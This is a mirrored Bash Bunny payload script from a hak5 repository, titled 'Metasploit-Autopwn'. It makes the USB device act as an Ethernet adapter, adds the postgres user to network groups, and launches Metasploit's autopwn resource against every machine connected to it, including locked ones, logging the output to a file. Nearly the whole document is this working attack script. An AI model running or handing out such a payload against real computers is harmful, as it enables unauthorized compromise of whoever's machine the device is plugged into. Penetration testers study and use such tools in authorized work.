mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
33 lines
1.3 KiB
Bash
33 lines
1.3 KiB
Bash
#!/bin/bash
|
|
#
|
|
# Title: Metasploit-Autopwn
|
|
# Author: Mohamed A. Baset - @SymbianSyMoh - Seekurity.com
|
|
# Version: 0.1
|
|
#
|
|
#
|
|
# Runs Metasploit db_autopwn module against the whole dhcp clients conencted
|
|
# to the Bash Bunny device exploiting locked and unlocked machines that running
|
|
# vulnerable OSes or services.
|
|
# Prequisities:
|
|
# 1. Ruby 2.4.1 installed via rbenv (the best to have ruby installed without any problems)
|
|
# 2. You must have metasploit installation up and running in path /toos/metasploit-framework/
|
|
# 3. Copy auto_pwn.rc metasploit resources file from the payload folder to /tools/ by SSHing into your bunny
|
|
# 4. One-time fix for adding user "postgres" to the network user groups (should be done by HAK5 folks in the first place)
|
|
|
|
# Script
|
|
# LED SETUP................Setting up stuff
|
|
# LED ATTACK...............Running Metasploit Autopwn Module
|
|
# LED FINISH...............Attack Finished
|
|
|
|
LED SETUP
|
|
# One-time fix for adding user "postgres" to the network user groups
|
|
usermod -a -G netdev,systemd-network,net_raw postgres
|
|
CUCUMBER PLAID
|
|
ATTACKMODE RNDIS_ETHERNET
|
|
# Please adjust a nearest date/time
|
|
# date -s "20170830 01:23"
|
|
LED ATTACK
|
|
# For debugging we are writing the whole output into a file in /tools
|
|
/root/.rbenv/shims/ruby /tools/metasploit-framework/msfconsole -r /tools/auto_pwn.rc >> /tools/msfAutopwnOUTPUT.txt
|
|
LED FINISH
|